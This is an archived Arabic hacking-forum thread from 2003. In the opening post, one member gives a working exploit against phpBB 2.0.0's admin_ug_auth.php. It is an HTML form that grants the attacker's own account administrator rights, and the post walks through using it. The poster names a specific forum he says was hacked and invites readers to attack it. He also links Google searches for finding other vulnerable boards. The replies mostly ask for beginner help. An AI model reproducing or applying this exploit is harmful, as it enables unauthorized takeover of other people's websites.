المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : اخترااق جميع المنتداايات phpbb 2.0.0 من خلال ثغرة معروفه


أبو خالد
05-02-2003, 03:47
كيفكم شباا ب طيبين انشاء الله اليوم موضوعنا عن اختراق المنتدايات


phpbb 2.0.0

وهو شبيه بالـvb

وهو سهل جدا بل يعتبر تااافه

يالله سمو بالله



PhpBB2
في ملف admin_ug_auth.php
الوصف:
يمكنك من خلال هذه الثغرة أن تأخذ تصريح بأن تكون مدير والمشرف العام على المنتدى
وبذلك يمكنك الدخول الى لوحة التحكم متى شئت
الأصدار:
2.0.0
لتجربة الثغرة اولا سجل بالمنتدى
ثم احفظ رقم عضويتك بالمنتدى
بعدها افتح المفكرة وانسخ مايلي اليها

<html>
<head>
</head>
<body>

<form method="post"
action="http://www.domain_name/board_directory/admin/admin_ug_auth.php">
User Level: <select name="userlevel">


تحياتي

أبو خالد

<option value="admin">Administrator</option>
<option value="user">User</option></select>
<input type="hidden" name="private[1]" value="0">
<input type="hidden" name="moderator[1]" value="0">
<input type="hidden" name="mode" value="user">
<input type="hidden" name="adv" value="">
User Number: <input type="text" name="u" size="5">
<input type="submit" name="submit" value="Submit">

</form>
</body>
</html>

عدل هذا العنوان الى عنوان الموقع المستهدف http://www.domain_name/board_directory
اخفظه بامتدادhtml
عندما تدخل الى الصفحة التي قمت بحفظها سوف تجد
قائمة والتي يتم اختيار التصريح الذي تريده لتطبيق الثغرة اختر تصريح Administrator
ثم بالمربع الجانبي شع رقم عضويتك بالمنتدى
أضغط زر submit
بعدها سوف تاتيك شاشة تسجيل الدخول ضع اسم المستخدم وكلمة المرور الخاصة بك
ثم سوف تجد نفسك في لوحة تحكم المنتدى !! أفعل ماتريد المنتدى منتداك

وسلاااامتكم شفتو سهولت الدرس وهو صرااحه منقول بس تعرفو ما حبيت انزله الا وعليه تطبيق

شووفوو المنتدا ذا


http://forums.xos.ca


اخترقوه

super linex

veto

وانا ما عملت شي غير كتبت الموضوع

ولعبت وخبصت في المنتدا وبس

مع تحياتي

وانشاء الله تكونو استفدتو اخوكم


وهذي مواقع أجنبية تعمل على هذا الاصدرا


من هناااااااااااااااااا بس لا تجرب على اي منتدى عربي (http://www.google.com/search?hl=ar&ie=UTF-8&oe=UTF-8&q=+by+phpbb+2.0.0&btnG=%D8%A8%D8%AD%D8%AB+Google&lr=) |4|

أبو خالد
05-02-2003, 03:53
من هنااااااااااا (http://www.google.com/search?hl=ar&ie=UTF-8&oe=UTF-8&q=%22Powered+by+phpbb+2.0.0%22&lr=)


تحياتي


:D

القرصان
05-02-2003, 05:49
:) :) |3| :) :)

القرصان

قبلة الموت
05-02-2003, 09:35
وين الملف الي نعدل فيه :(

The MoHicans
06-02-2003, 12:05
مشكور ابوخالد بس لو توضح للمبتدئين الي زي حالتي وين الملف
وين نضعه وضح بشكل تفصيلي وكيف نحفظه بامتداد html



ولك تحياتي

hi_HaCkEr
06-02-2003, 11:16
وهي كانت ثغرة فعلا في هذا الاصدار من منتديات php

تحياتي للجميع

|4|

hetlar_911
13-02-2003, 12:51
مشكور يا ابو خالد وما قصرت

ويا يوسف هنا تلقى وش معنى امتداد الملفات

http://members.lycos.co.uk/hckrz/vb/showthread.php?threadid=33

إلكترون
04-08-2003, 02:38
مشكور ابوخالد بس لو توضح للمبتدئين الي زي حالتي وين الملف
وين نضعه وضح بشكل تفصيلي وكيف نحفظه بامتداد html



ولك تحياتي مشكور يا ابو خالد وما قصرت

مُجَاهِد
04-08-2003, 06:43
كاتب الرسالة الأصلية : إلكترون
مشكور ابوخالد بس لو توضح للمبتدئين الي زي حالتي وين الملف
وين نضعه وضح بشكل تفصيلي وكيف نحفظه بامتداد html



ولك تحياتي مشكور يا ابو خالد وما قصرت

hsmabedah
11-11-2005, 05:06
سؤال؟
كيف اعرف اصدار ال php اللي المندي مساوى فيه؟؟

متكي ورا الشمس
11-11-2005, 02:43
hsmabedah
وين طلعت الموضوع منه ,, الموضوع قديم جدا من سنه 2003 والاصدار ذا انقرض ,, الحين طلعت ثغرات خطيره اقوى منها كثير لنفس المنتدى ,, تعرف الاصدار تحت في المنتدى مكتوب باي phpbb بعدين اصدار المنتدى ,, رجاءا لاتطلع مواضيع قديمه ,, شاكر تعاونك ,,

###############
موضوع مغلق

###############